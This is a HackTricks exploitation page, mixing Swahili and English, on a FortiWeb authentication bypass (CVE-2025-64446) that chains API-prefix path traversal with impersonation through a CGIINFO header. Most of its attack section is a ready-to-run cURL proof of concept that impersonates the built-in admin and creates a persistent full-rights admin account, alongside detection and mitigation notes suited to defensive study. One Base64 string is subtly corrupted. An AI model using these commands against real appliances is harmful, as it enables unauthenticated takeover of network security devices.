Fortinet FortiWeb — Auth bypass via API-prefix traversal and CGIINFO impersonation

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Muhtasari

Fortinet FortiWeb exposes a centralized CGI dispatcher at /cgi-bin/fwbcgi. Mnyororo wa mdudu wawili unamruhusu mshambuliaji wa mbali ambaye hajathibitishwa kufanya:

• Reach fwbcgi by starting the URL with a valid API prefix and traversing directories.
• Impersonate any user (including the built-in admin) by supplying a special HTTP header that the CGI trusts as identity.

Vendor advisory: FG‑IR‑25‑910 (CVE‑2025‑64446). Utekelezwaji umeonekana kwa vitendo kuunda watumiaji wa admin wa kudumu.

Matoleo yaliyoathiriwa (kama ilivyoelezwa hadharani):

• 8.0 < 8.0.2
• 7.6 < 7.6.5
• 7.4 < 7.4.10
• 7.2 < 7.2.12
• 7.0 < 7.0.12
• 6.4 ≤ 6.4.3
• 6.3 ≤ 6.3.23

FortiWeb 8.0.2 inarudisha HTTP 403 kwa jaribio la traversal hapa chini.

Jaribio la haraka la udhaifu

• Path traversal from API prefix to fwbcgi:

GET /api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi HTTP/1.1
Host: <target>

• Ufafanuzi: HTTP 200 → inawezekana dhaifu; HTTP 403 → imepachikwa.

Mnyororo wa chanzo

1. API-prefix path traversal hadi internal CGI

• Kila request path inayotanguliza na API prefix halali ya FortiWeb (mfano, /api/v2.0/cmdb/ au /api/v2.0/cmd/) inaweza kufanya traverse kwa ../ hadi /cgi-bin/fwbcgi.

2. Minimal-body validation bypass

• Mara fwbcgi itakapofikiwa, mlango wa kwanza hufanya ukaguzi mwepesi wa JSON uliounganishwa na faili maalum kwa kila path chini ya /var/log/inputcheck/. Ikiwa faili haipo, ukaguzi hupitishwa mara moja. Ikiwa ipo, mwili unahitaji tu kuwa JSON halali. Tumia {} kama mwili mdogo unaokubalika.

3. Header-driven user impersonation

• Programu husoma variable ya mazingira ya CGI HTTP_CGIINFO (inayotokana na HTTP header CGIINFO), Base64-decodes, inachambua JSON, na kunakili sifa moja kwa moja kwenye muktadha wa kuingia, ikiteua domain/VDOM. Vifunguo vinavyovutia:
• username, loginname, vdom, profname
• Example JSON to impersonate the built-in admin:

{
"username": "admin",
"profname": "prof_admin",
"vdom": "root",
"loginname": "admin"
}

Base64 ya hapo juu (kama inavyotumika katika ulimwengu halisi):

eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb201OiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ==

Mfumo wa matumizi mabaya mwishowe-mwisho (bila uthibitisho → admin)

1. Fikia /cgi-bin/fwbcgi kupitia API-prefix traversal.
2. Toa mwili wowote wa JSON halali (kwa mfano, {}) ili kukidhi ukaguzi wa ingizo.
3. Tuma header CGIINFO: <base64(json)> ambapo JSON inafafanua utambulisho wa lengo.
4. POST JSON ya backend inayotarajiwa na fwbcgi ili kufanya vitendo vilivyo na ruhusa (kwa mfano, unda admin user kwa kudumu).

Minimal cURL PoC

• Chunguza traversal exposure:

curl -ik 'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'

• Kujifanya admin na kuunda local admin user mpya:

# Base64(JSON) for admin impersonation
B64='eyJ1c2VybmFtZSI6ICJhZG1pbiIsICJwcm9mbmFtZSI6ICJwcm9mX2FkbWluIiwgInZkb20iOiAicm9vdCIsICJsb2dpbm5hbWUiOiAiYWRtaW4ifQ=='

curl -ik \
-H "CGIINFO: $B64" \
-H 'Content-Type: application/json' \
-X POST \
--data '{"data":{"name":"watchTowr","access-profile":"prof_admin","access-profile_val":"0","trusthostv4":"0.0.0.0/0","trusthostv6":"::/0","type":"local-user","type_val":"0","password":"P@ssw0rd!"}}' \
'https://<host>/api/v2.0/cmdb/system/admin/../../../../../cgi-bin/fwbcgi'

Vidokezo:

• Mwili wowote wa JSON unaokubalika unatosha (mfano, {}) ikiwa /var/log/inputcheck/<path>.json haipo.
• The action schema ni FortiWeb-internal; mfano uliotolewa hapo juu unaongeza msimamizi wa ndani (local admin) kwa ruhusa kamili.

Detection

• Maombi yanayofikia /cgi-bin/fwbcgi kupitia API-prefix paths zinazojumuisha ../ (mfano, /api/v2.0/cmdb/.../../../../../../cgi-bin/fwbcgi).
• Kuwepo kwa kichwa CGIINFO chenye Base64 JSON yenye funguo username/loginname/vdom/profname.
• Artefakti za backend:
• Faili kwa kila path chini ya /var/log/inputcheck/ (gate configuration).
• Uundaji wa admin usiotarajiwa na mabadiliko ya usanidi.
• Uthibitisho wa haraka: traversal probe kurudisha 200 (exposed) dhidi ya 403 (blocked katika fixed builds).

Mitigation

• Sasisha hadi matoleo yaliyorekebishwa (mfano: 8.0.2, 7.6.5, 7.4.10, 7.2.12, 7.0.12) kulingana na ushauri wa muuzaji.
• Hadi itakaporekebishwa:
• Usifichue FortiWeb management plane kwa mitandao isiyo ya kuaminika.
• Ongeza sheria za reverse-proxy/WAF ili kuzuia:
• Njia zinazoanza na /api/ na zinazoambatanisha ../cgi-bin/fwbcgi.
• Maombi yanayoambatana na kichwa CGIINFO.
• Fuatilia na toa tahadhari kuhusu viashiria vya ugunduzi vilivyo hapo juu.

References

• When the impersonation function gets used to impersonate users — Fortinet FortiWeb auth bypass (watchTowr Labs)
• watchTowr vs FortiWeb Auth Bypass — Detection artefact generator

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.